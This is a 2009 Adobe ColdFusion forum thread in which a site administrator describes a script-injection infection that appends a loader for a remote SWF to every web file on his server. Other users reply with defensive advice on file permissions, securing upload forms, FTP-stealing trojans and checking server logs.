Skip to main content
P
paulferree
Known Participant
July 2, 2009
Question

CFM <script> injection hack...

  • July 2, 2009
  • 4 replies
  • 3471 views

Our servers have been hacked and we're having trouble finding the point of entry for the trojan.

What we're seeing is essentially every web file (.htm(l),.cfm,.php,.js, etc) being appended with a script code trying to load a swf from "chanm.3322.org/flash/".

We've cleaned it up once and then restarted the server and it got infected again.

Is this familiar to anybody else here yet?  Any tips on cleaning this up??

Ugh, headache!

Thanks

Paul

      4 replies

      T
      TLC-IT
      Inspiring
      July 2, 2009

      If you are getting this kind of problem, then obviously your server-side security is insufficient:

      • If you are using a shared hosting service, then you are completely dependent upon the security (or lack thereof) that is maintained by the hosting service.  If your directories are not adequately protected, then some other person who has an account on the same box might be able to diddle with your files.

      • It isn't enough for you to simply FTP (or SFTP) your files up to the server, leaving their file-access permissions at a very convenient default value.  You need to know what user-ID your web server is logged on as (it might be "nobody" or it might be you!), and you need to protect all of the executable material, any images and reference-files and so on, so that they are read-only, or execute-only.  The ColdFusion application server needs to be able to access the scripts (that is to say, the auto-generated Java ...) but neither it nor the web-server should serve the files directly.  And neither of them should be able to modify or replace any of those files:  they should not have sufficient permissions to do so.

      If an image-upload succeeded in making such a file replacement, then there are any number of points at which such an action should have been rendered impossible ... and so, if they succeeded, "shame on you."

      1. Navigation outside of the target space for storing images should have been impossible.
      2. Use of ".." and other things in URLs or file-locations should have been impossible.
      3. Only the intended destination for the images should have been writeable, and symlinks should not have been honored.
      4. Modification (or disclosure) of the ColdFusion materials should have been impossible.

      How do I say this delicately...  if this happened, then the person(s) responsible should be fighting to keep their jobs in the face of "gross negligence" and "dereliction of duty." :-/

      They should, as my grandma would say, at least "have some 'splainin to do..."

      Ken_Ford_-_ACP-QFo4AB
      Ken_Ford_-_ACP-QFo4AB
      Inspiring
      July 2, 2009

      Looks like it may be an image upload form:

      http://www.coldfusionjedi.com/index.cfm/2009/6/30/Are-you-aware-of-the-MIMEFile-Upload-Security-Issue

      http://badwarebusters.org/main/itemview/5298

      http://www.cfexecute.com/post.cfm/spoofing-mime-types-with-coldfusion-and-cfhttp

      This should tell you how to secure the form:

      http://www.petefreitag.com/item/701.cfm

      Ken Ford
      Adobe Community Expert - Dreamweaver/ColdFusion
      Adobe Certified Expert - Dreamweaver CS4
      Adobe Certified Expert - ColdFusion 8
      Fordwebs, LLC
      http://www.fordwebs.com
      http://www.cfnoob.com

      M
      mack_
      Participating Frequently
      July 2, 2009

      Please search the forums, this problem has been answered before

      (basically one of the computers with FTP access is infected with

      Gumblar or some other FTP-stealing-trojan).

      Mack

      D
      Daverms
      Inspiring
      July 2, 2009

      Hi,

      Have you checked your server logs?.

      Terms & ConditionsAccessibility statement
      Using the community Terms of use Privacy Cookie preferences Do not sell or share my personal information ad choicesAdChoices